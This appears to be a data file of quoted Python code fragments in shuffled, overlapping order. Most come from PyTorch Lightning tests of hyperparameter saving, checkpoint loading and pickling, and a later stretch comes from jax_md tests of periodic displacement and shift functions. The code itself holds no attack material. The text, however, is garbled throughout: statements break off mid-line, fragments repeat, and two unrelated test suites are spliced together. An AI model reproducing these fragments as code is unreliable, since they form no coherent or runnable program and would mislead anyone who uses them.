raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type']", "ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has", "pickled\"): trainer.fit(model) assert 'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir): hparams", "assert model.hparams.subclass_arg == 1200 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss)", "*args, **kwargs): super().__init__(*args, **kwargs) self.argument1 = arg1 # arg2 intentionally", "correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path) #", "we can overwrite the property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert", "hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model should accept hparams", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "if isinstance(model, 
SubClassEvalModel): assert model.hparams.subclass_arg == 1200 if isinstance(model, AggSubClassEvalModel):", "model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1, 'key2':", "def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test", "is intentionally here at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, #", "isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything' #", "assert model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths =", "assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify", "32 model = cls(batch_size=179, **extra_args) assert model.hparams.batch_size == 179 if", "super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test for inheritance: super class", "with explicit setter \"\"\" def __init__(self, hparams): super().__init__() self.hparams =", "raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This", "Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml =", "assert model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir): \"\"\" Tests that a", "return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has the super().__init__()", "torch from fsspec.implementations.local import LocalFileSystem from omegaconf import OmegaConf, Container", "SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls): \"\"\"", "the property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg == 78", "= cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg == 42 class AnotherArgModel(EvalModelTemplate): def", "LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14,", "only the initial hparams, no other runtime change allowed\"\"\" model", "other runtime change allowed\"\"\" model = cls(running_arg=123) assert model.hparams.running_arg ==", "property assignments assert model.hparams.test_arg == 14 # verify we can", "------------------------- def test_class_nesting(): class MyModule(LightningModule): def forward(self): ... 
# make", "can take an object \"\"\" def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams)", "loads correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17 def", "torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir, cls):", "== 1200 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify", "1200 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that", "LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has the _auto_collect_arguments() call at the", "LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 # verify that", "__init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)),", "for \"self\", \"*args\" and \"**kwargs\". \"\"\" def __init__(obj, *more_args, other_arg=300,", "model = cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg == 42 class AnotherArgModel(EvalModelTemplate):", "model = cls(batch_size=179, **extra_args) assert model.hparams.batch_size == 179 if isinstance(model,", "that a model can take an object with explicit setter", "suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls):", "saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) #", "path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) == hparams", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "]) def test_collect_init_arguments(tmpdir, cls): \"\"\" Test that the model automatically", "arg2, *args, **kwargs): super().__init__(*args, **kwargs) self.argument1 = arg1 # arg2", "= cls(arg1=1, arg2=2) assert 'local_var' not in model.hparams assert model.hparams['arg1']", "== 14 # verify we can train trainer = Trainer(default_root_dir=tmpdir,", "is intentionally here at the end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This", "RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we save/export only the", "class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take an", "Apache License, Version 2.0 (the \"License\"); # you may not", "verify that the checkpoint saved the correct values # trainer", "either express or implied. 
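# Illustrative sketch (not an original test): the helper above means a saved
# checkpoint can be inspected directly, without instantiating any model. Only
# names already used in this file are assumed here.
def test_raw_checkpoint_inspection_sketch(tmpdir):
    model = SaveHparamsModel(hparams=dict(test_arg=14))
    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2)
    trainer.fit(model)

    ckpt = torch.load(_raw_checkpoint_path(trainer))
    assert ckpt[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14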
class LocalVariableModelSuperLast(EvalModelTemplate):
    """ This model has the super().__init__() call at the end. """

    def __init__(self, arg1, arg2, *args, **kwargs):
        self.argument1 = arg1  # arg2 intentionally not set
        arg1 = 'overwritten'
        local_var = 1234
        super().__init__(*args, **kwargs)  # this is intentionally here at the end


class LocalVariableModelSuperFirst(EvalModelTemplate):
    """ This model has the _auto_collect_arguments() call at the end. """

    def __init__(self, arg1, arg2, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.argument1 = arg1  # arg2 intentionally not set
        arg1 = 'overwritten'
        local_var = 1234
        self.save_hyperparameters()  # this is intentionally here at the end


@pytest.mark.parametrize("cls", [
    LocalVariableModelSuperFirst,
    # LocalVariableModelSuperLast,
])
def test_collect_init_arguments_with_local_vars(cls):
    """ Tests that only the arguments are collected and not local variables. """
    model = cls(arg1=1, arg2=2)
    assert 'local_var' not in model.hparams
    assert model.hparams['arg1'] == 'overwritten'
    assert model.hparams['arg2'] == 2


# @pytest.mark.parametrize("cls,config", [
#     (SaveHparamsModel, Namespace(my_arg=42)),
#     (SaveHparamsModel, dict(my_arg=42)),
#     (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))),
#     (AssignHparamsModel, Namespace(my_arg=42)),
#     (AssignHparamsModel, dict(my_arg=42)),
#     (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))),
# ])
# def test_single_config_models(tmpdir, cls, config):
#     """ Test that the model automatically saves the arguments passed into the constructor """
#     model = cls(config)
#
#     # no matter how you do it, it should be assigned
#     assert model.hparams.my_arg == 42
#
#     # verify that the checkpoint saved the correct values
#     trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)
#     trainer.fit(model)
#
#     # verify that model loads correctly
#     raw_checkpoint_path = _raw_checkpoint_path(trainer)
#     model = cls.load_from_checkpoint(raw_checkpoint_path)
#     assert model.hparams.my_arg == 42


class AnotherArgModel(EvalModelTemplate):
    def __init__(self, arg1):
        super().__init__()
        self.save_hyperparameters(arg1)


class OtherArgsModel(EvalModelTemplate):
    def __init__(self, arg1, arg2):
        super().__init__()
        self.save_hyperparameters(arg1, arg2)


@pytest.mark.parametrize("cls,config", [
    (AnotherArgModel, dict(arg1=42)),
    (OtherArgsModel, dict(arg1=3.14, arg2='abc')),
])
def test_single_config_models_fail(tmpdir, cls, config):
    """ Test fail on passing unsupported config type. """
    with pytest.raises(ValueError):
        _ = cls(**config)


@pytest.mark.parametrize("past_key", ['module_arguments'])
def test_load_past_checkpoint(tmpdir, past_key):
    model = EvalModelTemplate()

    # verify we can train
    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)
    trainer.fit(model)

    # make sure the raw checkpoint saved the properties
    raw_checkpoint_path = _raw_checkpoint_path(trainer)
    raw_checkpoint = torch.load(raw_checkpoint_path)
    raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]
    raw_checkpoint['hparams_type'] = 'Namespace'
    raw_checkpoint[past_key]['batch_size'] = -17
    del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]
    # save back the checkpoint
    torch.save(raw_checkpoint, raw_checkpoint_path)

    # verify that model loads correctly
    model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path)
    assert model2.hparams.batch_size == -17


def test_hparams_pickle(tmpdir):
    ad = AttributeDict({'key1': 1, 'key2': 'abc'})
    pkl = pickle.dumps(ad)
    assert ad == pickle.loads(pkl)
    pkl = cloudpickle.dumps(ad)
    assert ad == pickle.loads(pkl)
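# Sanity sketch for the is_picklable helper imported above (not part of the
# original suite): plain containers pass, lambdas fail, mirroring the
# assertion inside UnpickleableArgsEvalModel below.
def test_is_picklable_sketch():
    assert is_picklable(AttributeDict({'key1': 1}))
    assert not is_picklable(lambda x: x + 1)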
class UnpickleableArgsEvalModel(EvalModelTemplate):
    """ A model that has an attribute that cannot be pickled. """

    def __init__(self, foo='bar', pickle_me=(lambda x: x + 1), **kwargs):
        super().__init__(**kwargs)
        assert not is_picklable(pickle_me)
        self.save_hyperparameters()


def test_hparams_pickle_warning(tmpdir):
    model = UnpickleableArgsEvalModel()
    trainer = Trainer(default_root_dir=tmpdir, max_steps=1)
    with pytest.warns(UserWarning, match="attribute 'pickle_me' removed from hparams because it cannot be pickled"):
        trainer.fit(model)
    assert 'pickle_me' not in model.hparams


def test_hparams_save_yaml(tmpdir):
    hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here',
                   nested=dict(any_num=123, anystr='abcd'))
    path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml')

    save_hparams_to_yaml(path_yaml, hparams)
    assert load_hparams_from_yaml(path_yaml) == hparams

    save_hparams_to_yaml(path_yaml, Namespace(**hparams))
    assert load_hparams_from_yaml(path_yaml) == hparams

    save_hparams_to_yaml(path_yaml, AttributeDict(hparams))
    assert load_hparams_from_yaml(path_yaml) == hparams

    save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams))
    assert load_hparams_from_yaml(path_yaml) == hparams
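# Round-trip sketch (uses only APIs already imported above): nested values
# survive the YAML round-trip as plain Python types regardless of the
# container the hparams started in.
def test_hparams_save_yaml_nested_sketch(tmpdir):
    hparams = dict(outer=dict(inner=1))
    path_yaml = os.path.join(tmpdir, 'nested-sketch.yaml')
    save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams))
    assert load_hparams_from_yaml(path_yaml)['outer']['inner'] == 1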
class NoArgsSubClassEvalModel(EvalModelTemplate):
    def __init__(self):
        super().__init__()


class SimpleNoArgsModel(LightningModule):
    def __init__(self):
        super().__init__()
        self.l1 = torch.nn.Linear(28 * 28, 10)

    def forward(self, x):
        return torch.relu(self.l1(x.view(x.size(0), -1)))

    def training_step(self, batch, batch_nb):
        x, y = batch
        loss = F.cross_entropy(self(x), y)
        return {'loss': loss, 'log': {'train_loss': loss}}

    def test_step(self, batch, batch_nb):
        x, y = batch
        loss = F.cross_entropy(self(x), y)
        return {'loss': loss, 'log': {'train_loss': loss}}

    def configure_optimizers(self):
        return torch.optim.Adam(self.parameters(), lr=0.02)


@pytest.mark.parametrize("cls", [
    SimpleNoArgsModel,
    NoArgsSubClassEvalModel,
])
def test_model_nohparams_train_test(tmpdir, cls):
    """Test models that do not take any argument in init."""

    model = cls()
    trainer = Trainer(
        max_epochs=1,
        default_root_dir=tmpdir,
    )

    train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32)
    trainer.fit(model, train_loader)

    test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32)
    trainer.test(test_dataloaders=test_loader)


def test_model_ignores_non_exist_kwargument(tmpdir):
    """Test that the model takes only valid class arguments."""

    class LocalModel(EvalModelTemplate):
        def __init__(self, batch_size=15):
            super().__init__(batch_size=batch_size)
            self.save_hyperparameters()

    model = LocalModel()
    assert model.hparams.batch_size == 15

    # verify that the checkpoint saved the correct values
    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)
    trainer.fit(model)

    # verify that we can overwrite whatever we want
    raw_checkpoint_path = _raw_checkpoint_path(trainer)
    model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99)
    assert 'non_exist_kwarg' not in model.hparams


class SuperClassPositionalArgs(EvalModelTemplate):

    def __init__(self, hparams):
        super().__init__()
        self._hparams = None  # pretend EvalModelTemplate did not call self.save_hyperparameters()
        self.hparams = hparams


class SubClassVarArgs(SuperClassPositionalArgs):
    """ Loading this model should accept hparams and init in the super class """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)


def test_args(tmpdir):
    """ Test for inheritance: super class takes positional arg, subclass takes varargs. """
    hparams = dict(test=1)
    model = SubClassVarArgs(hparams)
    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)
    trainer.fit(model)

    raw_checkpoint_path = _raw_checkpoint_path(trainer)
    with pytest.raises(TypeError, match=r"__init__\(\) got an unexpected keyword argument 'test'"):
        SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path)


class RuntimeParamChangeModelSaving(BoringModel):
    def __init__(self, **kwargs):
        super().__init__()
        self.save_hyperparameters()


class RuntimeParamChangeModelAssign(BoringModel):
    def __init__(self, **kwargs):
        super().__init__()
        self.hparams = kwargs


@pytest.mark.parametrize("cls", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign])
def test_init_arg_with_runtime_change(tmpdir, cls):
    """Test that we save/export only the initial hparams, no other runtime change allowed."""
    model = cls(running_arg=123)
    assert model.hparams.running_arg == 123

    model.hparams.running_arg = -1
    assert model.hparams.running_arg == -1
    model.hparams = Namespace(abc=42)
    assert model.hparams.abc == 42

    trainer = Trainer(
        default_root_dir=tmpdir,
        limit_train_batches=2,
        limit_val_batches=2,
        limit_test_batches=2,
        max_epochs=1,
    )
    trainer.fit(model)

    path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE)
    hparams = load_hparams_from_yaml(path_yaml)
    assert hparams.get('running_arg') == 123


class UnsafeParamModel(BoringModel):
    def __init__(self, my_path, any_param=123):
        super().__init__()
        self.save_hyperparameters()


def test_model_with_fsspec_as_parameter(tmpdir):
    model = UnsafeParamModel(LocalFileSystem(tmpdir))
    trainer = Trainer(
        default_root_dir=tmpdir,
        limit_train_batches=2,
        limit_val_batches=2,
        limit_test_batches=2,
        max_epochs=1,
    )
    trainer.fit(model)
    trainer.test()
load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) ==", "= MyModule() assert isinstance(a, torch.nn.Module) def test_outside(): a = MyModule()", "arg1, arg2, *args, **kwargs): super().__init__(*args, **kwargs) self.argument1 = arg1 #", "model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath)", "back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) # verify that model loads", "1234 self.save_hyperparameters() # this is intentionally here at the end", "that has unconventional names for \"self\", \"*args\" and \"**kwargs\". \"\"\"", "# verify that we can overwrite whatever we want raw_checkpoint_path", "'abc'}) pkl = pickle.dumps(ad) assert ad == pickle.loads(pkl) pkl =", "= batch loss = F.cross_entropy(self(x), y) return {'loss': loss, 'log':", "# You may obtain a copy of the License at", "**kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel,", "15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a model can take", "is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir,", "torch.nn import functional as F from torch.utils.data import DataLoader from", "= AttributeDict({'key1': 1, 'key2': 'abc'}) pkl = pickle.dumps(ad) assert ad", "hparams): super().__init__() self._hparams = None # pretend EvalModelTemplate did not", "# verify that model loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123)", "inheritance: super class takes positional arg, subclass takes varargs. \"\"\"", "hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir,", "test proper property assignments assert model.hparams.test_arg == 14 # verify", "with pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from hparams because it cannot", "take an object with explicit setter \"\"\" def __init__(self, hparams):", "class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has the _auto_collect_arguments() call at", "config specific tests assert model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\"", "__init__(self, arg1, arg2, *args, **kwargs): self.argument1 = arg1 # arg2", "import functional as F from torch.utils.data import DataLoader from pytorch_lightning", "save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self):", "proper property assignments assert model.hparams.test_arg == 14 # verify we", "takes varargs. 
\"\"\" hparams = dict(test=1) model = SubClassVarArgs(hparams) trainer", "hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a model", "hparams): super().__init__() self.hparams = hparams # ------------------------- # STANDARD TESTS", "AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that the checkpoint saved", "assert model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)),", "import OmegaConf, Container from torch.nn import functional as F from", "for x in raw_checkpoint_paths if '.ckpt' in x] assert raw_checkpoint_paths", "\"License\"); # you may not use this file except in", ") trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert", "overfit_batches=0.5) trainer.fit(model) # make sure the raw checkpoint saved the", "= Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\)", "[RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we save/export only", "train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model", "LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert", "def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that", "raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x for x in raw_checkpoint_paths", "raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) # verify", "Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) # make sure the raw checkpoint", "y = batch loss = F.cross_entropy(self(x), y) return {'loss': loss,", "Tests for the existence of an arg 'test_arg=14' \"\"\" hparam_type", "# raw_checkpoint_path = _raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path) # assert", "cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate() #", "SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model should accept hparams and init", "test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate() # verify we can train", "hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def", "Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model) # # # verify that", "test_single_config_models(tmpdir, cls, config): # \"\"\" Test that the model automatically", "== hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams))", "assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that the checkpoint saved the", "argparse import Namespace import 
cloudpickle import pytest import torch from", "trainer = Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True,", "self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take", "isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that the checkpoint" ]
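# ---------------------------------------------------------------------------
# Illustrative sketch, not one of the original tests above: a minimal
# end-to-end version of the hparams round trip that `_run_standard_hparams_test`
# exercises. The names `DemoModel` and `_example_hparams_roundtrip` are
# hypothetical and introduced here only for illustration;
# `save_hyperparameters`, `load_from_checkpoint`, `Trainer`, `BoringModel` and
# `_raw_checkpoint_path` are the same APIs and helpers used throughout this file.
# ---------------------------------------------------------------------------
def _example_hparams_roundtrip(tmpdir):
    class DemoModel(BoringModel):  # hypothetical demo class
        def __init__(self, test_arg=14):
            super().__init__()
            # records `test_arg` into self.hparams and into every checkpoint
            self.save_hyperparameters()

    model = DemoModel()
    assert model.hparams.test_arg == 14

    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, limit_train_batches=2, limit_val_batches=2)
    trainer.fit(model)

    # hparams travel inside the .ckpt, so no arguments need to be re-passed
    ckpt = _raw_checkpoint_path(trainer)
    restored = DemoModel.load_from_checkpoint(ckpt)
    assert restored.hparams.test_arg == 14

    # explicit kwargs to `load_from_checkpoint` override the stored values
    restored = DemoModel.load_from_checkpoint(ckpt, test_arg=78)
    assert restored.hparams.test_arg == 78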
[ "disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R))", "for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key =", "box_format) deformed_box = box * 0.9 R_new = s_g(R, grad(E_g)(R),", "Issue #5849.') N = 16 R_f, R, box, (s, E),", "box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if box_format", "* random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 *", "2.0 (the \"License\"); # you may not use this file", "spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13 if dtype", "split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped =", "= space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct =", "fails due to JAX Issue #5849.') N = 16 R_f,", "box_format in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N =", "= random.PRNGKey(0) tol = 1e-13 if dtype is f32: tol", "# https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "permissions and # limitations under the License. \"\"\"Tests for jax_md.space.\"\"\"", "box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N =", "= 0.5 * random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0", "E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R),", "for _ in range(STOCHASTIC_SAMPLES): key, split = random.split(key) R =", "random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R),", "shift = space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement =", "dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if box_format == 'scalar':", "= grad(lambda R: jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn = grad(lambda", "BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "box = jnp.array(jnp.eye(dim) * box_size, dtype) d, s = space.periodic(jnp.diag(box)", "= random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test", "metric = space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric", "+ dtransform_1), dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn =", "box_format) @grad def box_energy_g_fn(box): return E_g(R, new_box=box) @grad def box_energy_gf_fn(box):", "box_size, dtype) elif box_format == 'matrix': box = jnp.array(jnp.eye(dim) *", "_ in range(SHIFT_STEPS): key, split = random.split(key) dR = random.normal(", "of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless", "= jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted <", "in range(STOCHASTIC_SAMPLES): key, 
split_R, split_T = random.split(key, 3) dT =", "dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size) assert shift_fn(R_scaled,", "License for the specific language governing permissions and # limitations", "split_R, split_dR = random.split(key, 4) size_0 = 10.0 * random.uniform(split_T0_scale,", "jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype)", "[2, 3] BOX_FORMATS = ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE", "unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert", "random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric =", "spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _", "== dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size) assert", "absl.testing import parameterized from jax.config import config as jax_config from", "dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype ==", "jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R,", "jnp.where(dR < -0.49, f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0), R, dR)", "space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted", "= jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT =", "= space.periodic_general(box) d_g, s_g = space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0)", "dtype=dtype) tol = 1e-13 if dtype is f32: tol =", "= space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn", "= jnp.diag(box_size) R = random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled", "dR + jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted =", "spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "= random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 =", "= box * 0.9 R_new = s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_energy(self,", "'testcase_name': 